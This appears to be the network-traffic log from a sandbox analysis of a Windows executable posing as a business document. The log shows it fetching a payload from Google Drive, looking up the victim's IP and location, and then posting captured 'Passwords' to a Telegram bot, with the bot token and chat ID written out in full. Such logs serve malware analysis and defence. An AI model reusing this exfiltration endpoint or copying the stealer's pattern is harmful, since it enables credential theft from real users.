                                                                                                          Dec 18, 2024 09:53:03.855438948 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 18 Dec 2024 08:53:03 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 41175f89884bbcd1ef45ac0754a77f88
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          18192.168.2.449926158.101.44.242802692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 18, 2024 09:53:06.187999010 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 18, 2024 09:53:07.397157907 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 18 Dec 2024 08:53:07 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 963b6f06cdc515bd102c35a33ce4e4e2
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          19192.168.2.449937158.101.44.242802692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 18, 2024 09:53:11.861773014 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 18, 2024 09:53:12.269438028 CET321INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 18 Dec 2024 08:53:12 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 104
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: f0a4456c346e9834ec9fc1b35346b872
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.449736172.217.17.464432692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-18 08:51:46 UTC216OUTGET /uc?export=download&id=1kBgXhcovDf8sC7oAs4bfda6EBKjidm_z HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                          Host: drive.google.com
                                                                                                          Cache-Control: no-cache
                                                                                                          2024-12-18 08:51:47 UTC1920INHTTP/1.1 303 See Other
                                                                                                          Content-Type: application/binary
                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                          Date: Wed, 18 Dec 2024 08:51:46 GMT
                                                                                                          Location: https://drive.usercontent.google.com/download?id=1kBgXhcovDf8sC7oAs4bfda6EBKjidm_z&export=download
                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                          Content-Security-Policy: script-src 'nonce-2AlZmIrMJ3iyDUVkFYcj7w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                          Server: ESF
                                                                                                          Content-Length: 0
                                                                                                          X-XSS-Protection: 0
                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.449737172.217.17.654432692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-18 08:51:48 UTC258OUTGET /download?id=1kBgXhcovDf8sC7oAs4bfda6EBKjidm_z&export=download HTTP/1.1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                          Cache-Control: no-cache
                                                                                                          Host: drive.usercontent.google.com
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-18 08:51:51 UTC4937INHTTP/1.1 200 OK
                                                                                                          X-GUploader-UploadID: AFiumC5rt4EShPJ__0Zp8waIyjTjDDRzP-n_1VTo2BD94pSLfjenBa-eV4EUM3IayAhqDseC-ZOOMKE
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Security-Policy: sandbox
                                                                                                          Content-Security-Policy: default-src 'none'
                                                                                                          Content-Security-Policy: frame-ancestors 'none'
                                                                                                          X-Content-Security-Policy: sandbox
                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Content-Disposition: attachment; filename="jMUUKrSX63.bin"
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Credentials: false
                                                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 94272
                                                                                                          Last-Modified: Mon, 16 Dec 2024 22:53:18 GMT
                                                                                                          Date: Wed, 18 Dec 2024 08:51:51 GMT
                                                                                                          Expires: Wed, 18 Dec 2024 08:51:51 GMT
                                                                                                          Cache-Control: private, max-age=0
                                                                                                          X-Goog-Hash: crc32c=oNBXew==
                                                                                                          Server: UploadServer
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close
                                                                                                          2024-12-18 08:51:51 UTC4937INData Raw: 78 ce c8 43 e7 48 b7 ed d2 92 9b 78 99 80 08 b6 70 cc df 0a b5 f5 0e 3d 99 d5 da 32 36 36 eb ff 0f 61 fb fb 5a 85 70 01 d3 a5 81 31 55 4e 7f b9 a1 7f 7b 1d f0 5d d4 bb 2c 4e a7 e4 56 a7 33 5c 34 9c d7 81 36 c2 67 9c 37 e7 2d 4a be b7 b3 46 3a 48 2e 5f f2 e0 e2 6d 67 63 3e 6f 27 e8 3e 99 bb 53 33 4c 1a 36 b6 b2 9a 28 a4 34 6e 0d 23 0f 08 d1 75 23 72 e2 a8 df dd b7 ff e7 49 a7 47 e2 31 7b 32 2f 61 43 7d 20 23 74 94 f0 5f 11 6d 20 97 63 06 6f 1f 2d f3 4b 16 cd 2a 9a 84 60 d6 69 6d d4 77 e4 7e 57 e8 a2 ee cb 81 65 1b 39 5b 61 d0 1b bd 7c a3 ca 55 e2 3c f9 44 0d 9e 6d 6d f7 2f 0c 1d 89 05 d2 4f 0a 72 18 b7 47 e6 28 f5 11 cd be 36 5c 87 3d 18 58 e2 f9 dc f9 41 d7 3a f8 ba 5d 2c c6 d6 e8 d6 68 19 61 ff 4e 6a e4 7a 07 90 fc c9 24 74 38 9d 22 3f 09 d1 a1 85 75 42
                                                                                                          Data Ascii: xCHxp=266aZp1UN{],NV3\46g7-JF:H._mgc>o'>S3L6(4n#u#rIG1{2/aC} #t_m co-K*`imw~We9[a|U<Dmm/OrG(6\=XA:],haNjz$t8"?uB
                                                                                                          2024-12-18 08:51:51 UTC4823INData Raw: 6b c1 b8 d8 48 97 9d 55 18 7c 66 28 35 85 cf a2 bf 9c bb 39 15 b7 55 50 39 be c7 d4 ed 54 a2 7c 2f 75 7f 2c aa df c0 79 4f 98 e2 c4 e7 be ab b6 68 c0 3a 48 02 9c 1f a7 85 0f b4 d7 72 10 30 da ff af d1 6a dd 57 87 a6 1b b5 25 7d 6c 75 09 59 ac 2d 49 39 5e 66 62 c7 de 19 f2 3c 88 94 58 75 e3 7c 63 8c 87 00 5c e2 be 62 24 dd c2 bb 21 d9 1b 29 77 f6 06 9f e2 b1 3e e5 0e 65 d5 c9 8f fd 81 0f 16 d6 b4 1f 4f 38 e8 b6 9e b3 57 71 61 31 fe 10 f8 dd 8d 29 e4 1b 01 07 16 bc 20 95 6c 7d d9 a5 08 81 34 96 79 c9 f9 7f 2e 79 e2 84 23 d6 96 69 8d a7 82 22 47 96 b5 79 41 2e 7b 27 a1 b8 f4 d5 75 9f 1a 98 1d 89 80 db 76 cf 14 25 e4 ce 51 4f 1d 75 87 72 f1 e4 b7 db cb bc 6a 88 0b 6b ff cc 40 d7 3a c9 27 16 a1 4d bd ab 57 3d cc f2 05 3e 07 4c 41 7c d5 5a 81 b3 dc fb 0b 64 e0
                                                                                                          Data Ascii: kHU|f(59UP9T|/u,yOh:Hr0jW%}luY-I9^fb<Xu|c\b$!)w>eO8Wqa1) l}4y.y#i"GyA.{'uv%QOurjk@:'MW=>LA|Zd
                                                                                                          2024-12-18 08:51:51 UTC1324INData Raw: a6 ca 96 6b 95 30 05 7f 23 53 ee be 93 dd 47 f2 00 f4 b9 0e 32 a6 a6 a7 d1 d9 63 b8 a5 73 f3 c4 87 7b 24 44 c3 82 99 2a 5f 01 cd bb 77 e7 87 df f5 ae 49 06 b6 eb e5 a2 1c 7e c8 8f e1 c1 14 4d 61 b5 ed ed 81 2a f8 1d 67 84 26 8c ac 0c f1 3d 7e 79 b2 12 a7 52 0f 0a 7d 10 7d 9b 2a 17 80 c3 a5 bc 68 01 7e 0a 34 f3 0b 60 8b b0 72 ad cd 42 93 93 f9 fb a6 f5 e4 7b bd 0d 81 35 c6 19 cf 33 e7 27 62 15 48 b3 4c 89 4f 3d 5a e3 e5 ce 60 25 18 74 6f 27 ec 16 4a bb 53 39 4c 1a 36 b4 c9 d2 28 a4 30 10 5e 23 0f 02 f9 21 23 72 e8 a4 d7 ce b1 ee e1 e5 aa 45 99 77 64 88 25 49 24 74 ed 08 cc 95 bc 90 4b 75 48 fe 14 58 4c 6d 42 9e 11 23 a0 0a f3 e8 07 ab 01 08 f3 39 8c 5c 5e d1 cc ce a6 c7 96 5f 76 02 41 bd 74 f3 19 8d dc 68 e2 18 d3 45 0d 9e 48 6d f7 6e 49 1f f7 74 d3 4c 0e
                                                                                                          Data Ascii: k0#SG2cs{$D*_wI~Ma*g&=~yR}}*h~4`rB{53'bHLO=Z`%to'JS9L6(0^#!#rEwd%I$tKuHXLmB#9\^_vAthEHmnItL
                                                                                                          2024-12-18 08:51:51 UTC1390INData Raw: 90 a3 ed 24 6c 15 e4 de c6 24 c1 d3 ab b0 1a fc 8e ec d1 a9 e9 c9 91 c1 76 45 da 33 4d 53 0c 9f 64 59 7e aa 6e 07 85 38 a9 b6 f7 b8 21 d3 b7 61 19 58 68 c1 5a 69 02 41 e4 9a 80 09 54 f3 39 d6 06 6b 05 00 6d 55 3c 0f cd bb ed 48 0e bd b1 5f 9f 8f 56 fb 1b 5d 45 e9 02 47 62 a2 5f 65 99 5b 57 24 60 52 b6 43 3a b4 82 d7 29 32 e8 c6 b0 d6 36 2a dc 98 a3 ea 78 12 ab ce c1 c4 0b 7b 29 77 c8 36 ce 02 54 2d 94 d6 41 b3 47 88 ed 8a a9 cc e2 34 f0 10 33 f8 df f8 57 33 c9 4f 97 f5 4b 2d 52 cb 58 4b ec 37 23 f5 c4 c7 e4 ef d7 d1 c8 35 b5 e6 89 a9 e5 aa 70 42 a4 9c 1b d6 96 88 a1 63 23 2c d2 96 a6 1a 12 c0 e9 2b 54 b3 41 51 f2 da b1 99 d1 c1 7c 20 bc b4 37 90 6a 70 55 38 5b db bb 79 a0 7f d3 b0 18 1b 09 7f 1f 17 1c f3 f7 b6 29 ed bd 0c 41 19 f9 a7 3f ad ac 8f e3 de 0b
                                                                                                          Data Ascii: $l$vE3MSdY~n8!aXhZiAT9kmU<H_V]EGb_e[W$`RC:)26*x{)w6T-AG43W3OK-RXK7#5pBc#,+TAQ| 7jpU8[y)A?
                                                                                                          2024-12-18 08:51:52 UTC1390INData Raw: bf df c5 46 66 8b 93 84 c6 6c e7 3a 7d 4c 47 1d 6b 34 3a c4 dd 5e fe 02 ea 2e 74 71 86 26 07 d1 2d 3a 34 5c a2 8d 72 79 97 31 04 19 20 74 df 37 07 f0 47 9f 98 52 9e 67 3c 96 97 88 c1 4c a2 89 70 78 32 2d 99 94 f8 7c 20 75 fa 97 66 e6 19 a2 0e 3b 8f 0f 1a 37 c8 43 ef 1a ab 86 fa bd cf 73 9c a6 fd 7d 80 a5 e8 c4 b9 ce d0 8f 7e 61 d2 63 3c 83 b7 f5 0e 52 9f e9 49 b1 47 f0 1c ad 73 55 37 a2 71 f4 01 56 9d a4 48 bd 2f 69 44 70 4e 4c 5d db 8a 0c 05 95 d1 87 84 ae 71 19 20 44 b5 0b a2 f2 63 66 b3 7b 85 57 31 2a e6 9e 46 e3 6d c6 44 f3 36 35 18 c0 c2 30 1f f2 b9 07 62 f3 ca 37 2a 1d 89 db cd 77 d4 9f 19 d0 fc a3 51 ef 6e 42 d2 45 17 27 f8 41 d1 46 ee 01 8f d4 33 68 a1 d3 a6 da 73 4a 43 10 a8 62 4d df 40 0f 01 a3 e1 55 f0 8c ad 8d 61 b8 20 3e c5 f0 86 c6 e8 e4 ce
                                                                                                          Data Ascii: Ffl:}LGk4:^.tq&-:4\ry1 t7GRg<Lpx2-| uf;7Cs}~ac<RIGsU7qVH/iDpNL]q Dcf{W1*FmD650b7*wQnBE'AF3hsJCbM@Ua >
                                                                                                          2024-12-18 08:51:52 UTC1390INData Raw: ed e2 a2 47 f4 35 4f 88 27 4b f7 74 f6 32 ca 95 ae 93 30 39 79 fe 10 37 1f 6f 30 5c 22 77 d0 22 b7 e5 0e b2 0d 0f 79 4c 81 5e 24 91 cb e6 5a ef 45 55 60 f6 40 b0 7d ca 1c 9c c2 74 e1 0c ea 40 0d a6 b0 6d f7 7f 49 6f 6b 52 d3 3c 14 b6 db c2 f6 ec 2f dd eb cd be 3c 74 9c 3d 1a 53 fa fe 9d ff 2e 4d 3b f8 b0 46 24 ed 95 f9 de 07 b9 e4 fe 44 42 fe 7a 07 9a 4f c1 35 7d 4c 40 22 3f 28 c2 ab 94 7d 2d 11 34 8c f8 ed 0a b1 8d 5b 4e b2 b4 48 84 05 3c ef 33 73 15 32 f0 39 a5 3b b6 ce fa 4f e3 c4 8c 6a 09 82 46 e3 d3 64 8d 04 a4 27 55 4d 8e 56 2d 03 74 62 08 f2 a9 68 c5 14 81 a5 9f 2d 56 2b 06 a3 28 e9 97 e1 7f 48 83 79 a6 4a 50 f8 28 30 d7 be be b0 ad e4 84 4d f7 e8 8e bc 81 0a 37 c0 61 ed 85 8d 02 ef 69 0c 7d 52 dd d1 d6 9c 5d 98 86 d9 96 f7 97 5f 61 e5 46 fc c8 6d
                                                                                                          Data Ascii: G5O'Kt209y7o0\"w"yL^$ZEU`@}t@mIokR</<t=S.M;F$DBzO5}L@"?(}-4[NH<3s29;OjFd'UMV-tbh-V+(HyJP(0M7ai}R]_aFm
                                                                                                          2024-12-18 08:51:52 UTC1390INData Raw: e3 3d fb e9 e5 ad d0 84 91 49 20 9e d6 27 0f 20 6d 44 ad 7c 13 df 19 0c 39 79 53 7c 95 c2 6e d6 73 b3 09 34 80 2c c7 a3 9d 40 2b 9d e1 81 72 52 8c c0 90 d4 ea 8b 9c 75 e1 0e 0a 99 5d 3b 24 7f b1 7f b1 59 0d b5 f5 3c d7 86 5f b9 4d b6 49 1e 56 a6 70 38 df a1 75 32 b3 6e 61 8c 99 71 81 a6 d6 06 52 03 8f 10 15 78 17 11 a0 ca 87 dd 44 91 5d 5a ee b0 94 99 05 ef c1 60 f6 03 9d b0 9a c3 42 78 71 7b 11 5c 5c 9b 2c 55 12 21 19 70 b0 03 cd 00 76 e9 34 3a 74 a8 f5 2b ae aa 24 ff c3 48 42 c5 2a df 22 a3 10 97 7d cb 67 69 b0 f9 57 f2 05 81 dc 26 8a c3 91 62 21 98 90 32 9d ec 02 98 62 95 29 92 ee e6 6f 26 f5 93 8a 89 94 bd 66 19 49 29 2f 37 8f d3 fc b5 04 ba 87 d9 0c 6d 63 65 53 20 d6 f2 45 94 01 ed cc 6f 8f 59 29 c8 06 92 74 9a 96 b9 90 36 68 d1 a3 c9 c7 0e 77 e7 42
                                                                                                          Data Ascii: =I ' mD|9yS|ns4,@+rRu];$Y<_MIVp8u2naqRxD]Z`Bxq{\\,U!pv4:t+$HB*"}giW&b!2b)o&fI)/7mceS EoY)t6hwB
                                                                                                          2024-12-18 08:51:52 UTC1390INData Raw: 49 5b 33 1e d2 f5 fc 55 fa c8 fd c9 ae a3 06 1c 35 5d 3d b3 ee e9 de bd 7a 10 ef 3f 12 ad 77 e9 59 94 97 df ec 26 c1 4b 15 7b 70 da 07 0d 46 6f 8e fa bf b8 b7 09 2b 99 51 a6 0e 1d 0e b5 ec 69 ec bb 43 df 54 45 02 7f ab 31 d8 48 b6 b0 5c 38 c0 6e a6 56 e2 54 a5 cd 0a a7 30 0a ae 80 50 33 b8 d6 99 ed 54 ac 7c 18 75 7f 20 b9 04 cc 68 42 c6 07 c8 88 cf bd 9e e3 c0 e6 9c 07 47 34 85 80 7d 5c c1 76 60 0e a0 7e af db bd dc ab 84 f9 08 b9 34 0f 58 38 14 d0 e1 7b 42 38 0b 66 38 a0 ca 19 88 88 53 82 42 d2 d7 61 28 bb 93 00 2c 40 e8 f7 35 d9 6a 8d 3d ba 5b 42 69 86 a4 be 8a 2d 3b 47 21 16 29 e7 af f7 f1 bc 38 19 3b 1f 45 21 9b e9 91 b3 53 1a e0 3c d6 54 f8 cc 81 81 7a 1b 01 09 64 cc 3a 92 0b 83 fc a2 19 80 4a ad 47 29 0d a8 96 79 e2 50 5c 61 be 5a 87 a7 99 37 3b 92
                                                                                                          Data Ascii: I[3U5]=z?wY&K{pFo+QiCTE1H\8nVT0P3T|u hBG4}\v`~4X8{B8f8SBa(,@5j=[Bi-;G!)8;E!S<Tzd:JG)yP\aZ7;
                                                                                                          2024-12-18 08:51:52 UTC1390INData Raw: d9 94 91 63 72 86 95 50 de 5a 69 96 44 4a 2d b6 fa b1 e6 04 ab 12 22 4f 3a dd f0 f0 ed 4d 61 28 6b 83 09 03 d8 7e 7c 5d 93 f4 13 69 ef 07 68 d0 48 a3 2d 9f 49 b3 69 8e ac 1f 32 1b b3 5f c5 a9 ae 2f ce 92 f1 4f 75 47 7c dc 93 cc 95 57 d6 56 4e 2b b7 60 ae bb f0 90 2f ac 7a 44 33 bc 48 e5 d2 37 8e 12 68 3d 99 3d b9 07 b4 f8 1a db 7e 30 bf 05 60 04 cf 4d eb 23 a8 f2 ef 0f 7f 0a aa 33 4b 93 9a 05 96 33 53 c7 ee 6b 2a e9 7c 37 f4 f0 24 f5 68 53 81 b3 85 39 6a 6d b5 c5 b0 c3 e6 96 8a 49 b6 0a 6f a5 c6 91 b5 17 84 59 b5 c5 1e 90 02 c7 8d 22 d0 ae 91 1f 06 c9 ec 0d 0f a7 7f 4a 20 87 20 90 11 d1 68 5d 5e 8f 7c 88 90 87 b7 50 ba c3 72 33 e7 5e 60 53 58 d3 4c 07 04 f7 40 1b 35 8a b9 a5 31 47 30 bf 40 d5 84 87 b3 3b 45 e2 75 01 5e fd 4b 24 4d c0 67 64 b4 48 ef b0 fa
                                                                                                          Data Ascii: crPZiDJ-"O:Ma(k~|]ihH-Ii2_/OuG|WVN+`/zD3H7h==~0`M#3K3Sk*|7$hS9jmIoY"J h]^|Pr3^`SXL@51G0@;Eu^K$MgdH
                                                                                                          2024-12-18 08:51:52 UTC1390INData Raw: c7 36 18 cd 55 48 c7 24 3c ed bc 38 a6 f9 5a 30 02 14 06 34 38 a3 97 4a 8e fd 5c 24 60 59 c5 0a 44 cc 26 b2 a6 e4 a6 61 39 39 6d 0c a6 55 cd ca 9f f0 67 ee cf fa cc 15 31 25 f6 36 19 7e fc fe 4e fa bb a1 9e 2b af 5c f6 5e 9e 7d c1 3d b2 e3 75 f7 78 b6 89 64 e9 3d b2 21 cc e5 e9 2f 36 39 cd 2f 81 b6 68 de 25 05 95 34 d9 38 02 e6 01 a7 92 bd 0b 7a b3 a4 60 02 a1 de e5 0d 85 f1 a6 67 cc 32 92 22 c8 3d 8c c0 44 3c 43 65 51 a3 23 97 a4 47 64 5e a0 ca 81 38 ad dd 1b fa e1 2d ae 25 40 e1 d2 dc f5 d4 f6 05 e4 a8 7d 69 ae 8a e0 d5 8a 2b b9 a5 7d b4 12 86 7b 24 2b c4 86 17 49 0a d8 cd bb 75 f6 8c b5 b1 ba b7 03 8d 30 f4 a8 00 fd 85 9c ea d4 1f 61 5d 9d 47 ed 92 10 eb 18 92 db 26 8c 82 1d f8 04 eb 7b c9 52 b4 57 0b 74 2e 3b 5d 91 2a e9 80 c3 a5 be 7f 15 08 87 2c df
                                                                                                          Data Ascii: 6UH$<8Z048J\$`YD&a99mUg1%6~N+\^}=uxd=!/69/h%48z`g2"=D<CeQ#Gd^8-%@}i+}{$+Iu0a]G&{RWt.;]*,


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.449739172.67.177.1344432692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-18 08:51:56 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-12-18 08:51:57 UTC884INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 18 Dec 2024 08:51:56 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 362
                                                                                                          Connection: close
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 500685
                                                                                                          Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Celjmsl61zg%2BWyVoX2IF8Y8exLAvrD%2Bs9rOU8ZMqt4XcGABNdt3Px2ChlB%2FGvBDye%2B8lVQ%2FYfBP7OjZMxMSF14TptadlsmdU%2FWCbsepd9hDNxUzWAiQJLmg8b559rIr0EpUM92%2Bc"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f3de9f8bd9c5e7c-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1633&min_rtt=1633&rtt_var=613&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1784841&cwnd=196&unsent_bytes=0&cid=9c6b14e57fffb577&ts=453&x=0"
                                                                                                          2024-12-18 08:51:57 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.449752149.154.167.2204432692C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-18 08:52:05 UTC295OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd1f1755089ed1
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
